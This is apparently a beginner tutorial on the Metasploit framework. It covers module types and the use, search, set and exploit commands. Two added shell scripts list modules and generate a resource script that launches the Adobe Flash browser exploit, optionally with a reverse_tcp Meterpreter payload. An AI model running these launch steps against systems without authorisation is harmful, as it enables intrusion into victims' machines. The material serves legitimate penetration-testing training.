METASPLOIT COURSE

Metasploit For Beginners – #1 – The Basics – Modules, Exploits & Payloads

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Metasploit is the most widely used open-source exploitation framework. Nearly every hacker and pentester uses it to some extent, so you need to become familiar with it if you want to enter and prosper in this field.

Metasploit Interfaces

Metasploit has had several interfaces over the years, including:

(1) msfconsole – an interactive command-line interface, and the one this course uses throughout
(2) msfcli – a literal Linux command-line interface that ran one module per invocation (removed from the framework in 2015; the same one-liner use is covered by msfconsole -x "command1; command2")
(3) Armitage – a GUI front end written as a separate, third-party application
(4) msfweb – a browser-based interface (long since removed from the open-source framework)

 

Getting Started

Before we start Metasploit, we should start the PostgreSQL database. Metasploit will work without PostgreSQL, but the database makes module searches much faster and stores the hosts, services, credentials and loot you collect while scanning and exploiting, so they survive between sessions.

Start the PostgreSQL service before starting Metasploit by typing:

kali > service postgresql start

On newer Kali releases the equivalent is systemctl start postgresql, and msfdb init creates the Metasploit database and user on first use. Once the database has been started, you can start the Metasploit Framework console by typing:

kali > msfconsole

Inside the console, db_status tells you whether Metasploit is actually connected to the database; if it reports no connection, searches will still work but nothing you collect will be saved.

Metasploit Keywords

Although Metasploit is a very powerful exploitation framework, just a few keywords can get you started hacking just about any system.

Metasploit has six (6) types of modules:

   (1) exploits
   (2) payloads
   (3) auxiliary
   (4) nops
   (5) post
   (6) encoders

(Metasploit 5 later added a seventh type, evasion, for modules that generate payloads designed to slip past antivirus.)

A word about terminology before we start. In Metasploit terminology, an exploit is a module that takes advantage of a vulnerability in a system or application. It usually attempts to place a payload on the target: the code that runs once the exploit succeeds. That payload can be a simple command shell or the all-powerful Meterpreter. Be careful with overlapping terms you will see elsewhere: a listener (or handler) is the attacker-side component that waits for the payload to connect back, and a rootkit is a separate class of tool for hiding on a compromised host; neither is the same thing as a Metasploit payload. I will do a tutorial on each of these module types in the near future.
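The six module types above correspond to six directories on disk. On Kali the framework's modules live under /usr/share/metasploit-framework/modules, and modules you write or download go under ~/.msf4/modules, using the same layout. As an added example (not code from the original tutorial), the shell helpers below count the modules of each type in a tree and convert a file path back into the name that use expects; note that the directory is plural (exploits/) while the module name is singular (exploit/). The MSF_MODULES default path and the --run flag are this script's own conventions.

```shell
#!/bin/sh
# Added example, not from the original tutorial. Metasploit keeps each of the
# six module types in its own directory under the modules tree (on Kali:
# /usr/share/metasploit-framework/modules; your own additions go under
# ~/.msf4/modules). These helpers count modules per type and turn an on-disk
# path back into the name `use` expects.
set -eu

# Assumed default location (Kali); override with the MSF_MODULES variable.
MSF_MODULES="${MSF_MODULES:-/usr/share/metasploit-framework/modules}"

# Print "type count" for each of the six module types under $1.
# Only Ruby modules (*.rb) are counted.
module_counts() {
    dir="$1"
    for type in exploits payloads auxiliary nops post encoders; do
        if [ -d "$dir/$type" ]; then
            n=$(find "$dir/$type" -type f -name '*.rb' | wc -l)
        else
            n=0
        fi
        printf '%s %d\n' "$type" "$((n + 0))"
    done
}

# Convert a module file path under $1 into the name you pass to `use`.
# The directory names are plural (exploits/, payloads/, ...) but the module
# names are singular (exploit/, payload/, ...), except auxiliary and post.
path_to_name() {
    dir="$1"; path="$2"
    rel="${path#"$dir"/}"
    rel="${rel%.rb}"
    type="${rel%%/*}"
    rest="${rel#*/}"
    case "$type" in
        exploits) type=exploit ;;
        payloads) type=payload ;;
        encoders) type=encoder ;;
        nops)     type=nop ;;
        auxiliary|post) ;;
        *) printf 'unknown module type: %s\n' "$type" >&2; return 1 ;;
    esac
    printf '%s/%s\n' "$type" "$rest"
}

# Print the `use` name of every module under $1 whose file name contains $2
# (case-insensitive): a filesystem fallback for when `search` returns too much.
find_module() {
    dir="$1"
    needle=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
    find "$dir" -type f -name '*.rb' | while IFS= read -r f; do
        case "$(basename "$f" | tr 'A-Z' 'a-z')" in
            *"$needle"*) path_to_name "$dir" "$f" ;;
        esac
    done
}

# Usage: sh msf_modules.sh --run [name-fragment]
if [ "${1:-}" = "--run" ]; then
    module_counts "$MSF_MODULES"
    find_module "$MSF_MODULES" "${2:-flash}"
fi
```

Running it with --run flash on a Kali box lists the module counts and every module with "flash" in its file name, including exploit/windows/browser/adobe_flash_avm2 from this tutorial.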

Let’s take a look at some of those keyword commands. We can get a list of commands by typing help.

msf >  help

 

msf > use

The “use” command loads a module. So, for instance, if I wanted to load the exploit/windows/browser/adobe_flash_avm2 module (a browser exploit that takes advantage of one of the many vulnerabilities in the Adobe Flash plug-in: it starts a web server on your machine and waits for a victim's browser to visit it), I would type;

msf > use exploit/windows/browser/adobe_flash_avm2

 

msf > search

As a newcomer to Metasploit, the “search” command might be the most useful. When Metasploit was small and new, it was relatively easy to find the right module you needed. Now, with over 3000 modules, finding just the right module can be time-consuming and problematic, and the search command, with the keyword filters added in later versions, has become a time- and life-saver.

Although you can search for bare keywords, that approach is not always efficient, as it will often return a VERY large result set.

To be more specific in your search, you can use the following keyword filters (search -h lists the full set).

platform – the operating system the module is built for, such as windows or linux
type – the type of module: exploit, payload, auxiliary, nop, post or encoder
name – if you know part of the module's name, search by that
cve – the CVE identifier of the vulnerability the module targets

The syntax for using search is the keyword followed by a colon and then a value such as;

msf > search type:exploit

For instance, if you were looking for an exploit (type) for Windows (platform) for Abobe Flash, we could type;

msf > search type:exploit platform:windows flash

 

msf > set

This command is used to set options within the module you selected. After loading a module, type show options to see them: for our browser exploit these include URIPATH, SRVHOST and SRVPORT (the path, address and port of the web server the exploit stands up), and the listing marks which ones are required. We can set any of these with the set command, such as;

msf > set SRVPORT 80

This changes the default SRVPORT (server port) from 8080 to 80, so the victim's browser only has to visit a plain http:// URL.

     

msf > unset

This command, as you might expect, unsets the option that was previously set. Such as;

msf > unset SRVPORT

 

msf > exploit

 

Once we have loaded our exploit and set all the necessary options, the final action is “exploit” (“run” does the same thing). This launches the exploit against the target system and, if successful, delivers and runs the payload, which then opens a session back to you.
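Everything typed into msfconsole in this lesson (use, set, show options, exploit) can also be put into a resource script and replayed with msfconsole -r, which is how you make a lab setup repeatable. As an added example (not code from the original tutorial), the shell script below generates such a script for the module used above, rejecting anything that is not a KEY=VALUE option, and runs it if msfconsole is installed. The option values are placeholders for your own lab, and the --run flag is this script's own convention.

```shell
#!/bin/sh
# Added example, not from the original tutorial: the console sequence
# (use, set, show options, exploit) written as a Metasploit resource script
# and run with `msfconsole -r`. The module is the one the tutorial uses; the
# option values are placeholders for your own lab.
set -eu

# Emit the resource-script lines for MODULE followed by KEY=VALUE options.
# Each option becomes a `set` line; anything else is rejected so a typo does
# not turn into an arbitrary console command.
build_rc() {
    module="$1"; shift
    printf 'use %s\n' "$module"
    for opt in "$@"; do
        case "$opt" in
            [A-Za-z_]*=*)
                printf 'set %s %s\n' "${opt%%=*}" "${opt#*=}" ;;
            *)
                printf 'build_rc: bad option "%s" (expected KEY=VALUE)\n' "$opt" >&2
                return 1 ;;
        esac
    done
    # Show what is about to be launched, then launch it.
    # -j runs the exploit as a background job and -z does not drop you into a
    # session automatically, so the console stays scriptable afterwards.
    printf 'show options\nexploit -j -z\n'
}

# Usage: sh msf_rc.sh --run exploit/windows/browser/adobe_flash_avm2 SRVPORT=80 URIPATH=/
if [ "${1:-}" = "--run" ]; then
    shift
    [ "$#" -ge 1 ] || { echo "usage: $0 --run MODULE [KEY=VALUE ...]" >&2; exit 2; }
    rc=$(mktemp)
    build_rc "$@" > "$rc"
    echo "resource script written to $rc:" >&2
    cat "$rc"
    if command -v msfconsole >/dev/null 2>&1; then
        # Start PostgreSQL first (see Getting Started); -q skips the banner.
        msfconsole -q -r "$rc"
    else
        echo "msfconsole not found; copy $rc to a Kali box and run: msfconsole -q -r $rc" >&2
    fi
fi
```

A resource script can also finish with a payload choice (set PAYLOAD windows/meterpreter/reverse_tcp and its LHOST) before the exploit line; pass those as further KEY=VALUE arguments and they are emitted as set lines in order.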

 
